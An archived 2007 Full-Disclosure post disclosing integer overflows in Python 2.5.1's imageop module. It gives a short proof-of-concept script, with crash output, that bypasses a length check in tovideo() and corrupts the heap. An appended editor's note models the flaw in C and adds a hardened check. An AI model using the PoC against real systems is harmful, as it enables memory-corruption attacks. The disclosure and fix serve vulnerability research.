Date: Sun, 16 Sep 2007 01:53:32 +0200
From: "Slythers Bro" <slythers@...il.com>
To: "Full-Disclosure dis" <full-disclosure@...ts.grok.org.uk>
Subject: python <= 2.5.1 standard library: multiple int
	overflows, heap overflow in imageop module

The imageop module contains a lot of int overflows, which result in heap
overflows, and maybe a memory dump.
The files imageop.c and rgbimgmodule.c are examples.


static PyObject *
imageop_tovideo(PyObject *self, PyObject *args)
{
    int maxx, maxy, x, y, len;

   ........................

    /* *************** the int overflow here permits bypassing the len check
******************* */

    if ( maxx*maxy*width != len ) {
        PyErr_SetString(ImageopError, "String has incorrect length");
        return 0;
    }

    rv = PyString_FromStringAndSize(NULL, len);
    if ( rv == 0 )
        return 0;
    ncp = (unsigned char *)PyString_AsString(rv);

    if ( width == 1 ) {
        memcpy(ncp, cp, maxx);        /* Copy first line */
        ncp += maxx;

/* ********** with a negative value it's possible to bypass the loop below
********** */

        for (y=1; y<maxy; y++) {    /* Interpolate other lines */



-----------------------------------------------------------------------------------------------------------------------------

an IA-32 (32-bit) proof of concept:
*****************************************************************
import imageop   # Python 2 only (imageop was removed in Python 3); needs a 32-bit int build

sexshit = "a"*1603      # the image string: 1603 bytes, so len == 1603
evil = "p"*5241         # heap filler strings allocated around the target buffer
connard = "s"*2000
supaire= "45"*65
print supaire
connard = "cool"
salope = "suceuse"
# tovideo(image, width, maxx, maxy): 4461 * -2147002257 * 1 wraps to 1603 in a
# 32-bit int, so the length check passes and memcpy copies 4461 bytes into the
# 1603-byte result buffer (and reads 4461 bytes from the 1603-byte input)
dtc = imageop.tovideo(sexshit,1,4461,-2147002257)
sexshit = "dtc"*52
print connard,supaire," fin de dump"   # "fin de dump" = "end of dump"

**********************************************************************

www@...anticDrive:~$ python sux.py
4545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545
cool
4545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545
fin de dump
*** glibc detected *** corrupted double-linked list: 0x0817d3f0 ***
Abandon
www@...anticDrive:~$

ok, I hate Python's syntax, that's too old school! :p


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
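Added example (editor's note, not code from the post or from CPython): the C below models the wrapped length check from the imageop_tovideo() excerpt and a hardened replacement, using the PoC's own values (width 1, maxx 4461, maxy -2147002257, a 1603-byte string). Function names, the uint32_t modelling of the wraparound, and the overrun helper are assumptions made for illustration.

```c
/* Added example (not from the post): models the wrapped length check in
 * imageop_tovideo() and a hardened replacement. Function names and the
 * overrun helper are assumptions; the PoC values come from the post. */
#include <limits.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* The check as written in the excerpt: maxx*maxy*width compared to len.
 * Signed overflow is undefined in C, so the 32-bit int wraparound the
 * exploit relies on is modelled here with uint32_t, which wraps mod 2^32. */
static bool vulnerable_len_ok(int maxx, int maxy, int width, int len)
{
    uint32_t prod = (uint32_t)maxx * (uint32_t)maxy * (uint32_t)width;
    return prod == (uint32_t)len;
}

/* Hardened check: dimensions must be positive and the product must fit in
 * an int before it is computed, so no wraparound can ever equal len. */
static bool safe_len_ok(int maxx, int maxy, int width, int len)
{
    if (maxx <= 0 || maxy <= 0 || width <= 0 || len < 0)
        return false;
    if (maxx > INT_MAX / maxy)
        return false;
    int rows = maxx * maxy;            /* cannot overflow after the test above */
    if (rows > INT_MAX / width)
        return false;
    return rows * width == len;
}

/* For width == 1 the excerpt does memcpy(ncp, cp, maxx) into a buffer of
 * len bytes; returns how many bytes of that copy land past the allocation
 * (and, equally, how many bytes are read past the end of the input string). */
static long width1_overrun(int maxx, int len)
{
    if (maxx <= 0 || len < 0 || maxx <= len)
        return 0;
    return (long)maxx - (long)len;
}

int main(void)
{
    /* Values from the PoC in the post: width 1, maxx 4461, maxy -2147002257,
     * input string of 1603 bytes. */
    int maxx = 4461, maxy = -2147002257, width = 1, len = 1603;

    printf("vulnerable check passes: %s\n",
           vulnerable_len_ok(maxx, maxy, width, len) ? "yes" : "no");
    printf("hardened check passes:   %s\n",
           safe_len_ok(maxx, maxy, width, len) ? "yes" : "no");
    printf("bytes written past the %d-byte buffer: %ld\n",
           len, width1_overrun(maxx, len));
    return 0;
}
```

With the PoC values the wrapped product is exactly 1603, so the original check passes while the hardened one rejects the negative maxy outright; the width==1 path then copies 4461 bytes into (and reads 4461 bytes from) buffers of 1603 bytes, which is the corruption glibc reports in the run above.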
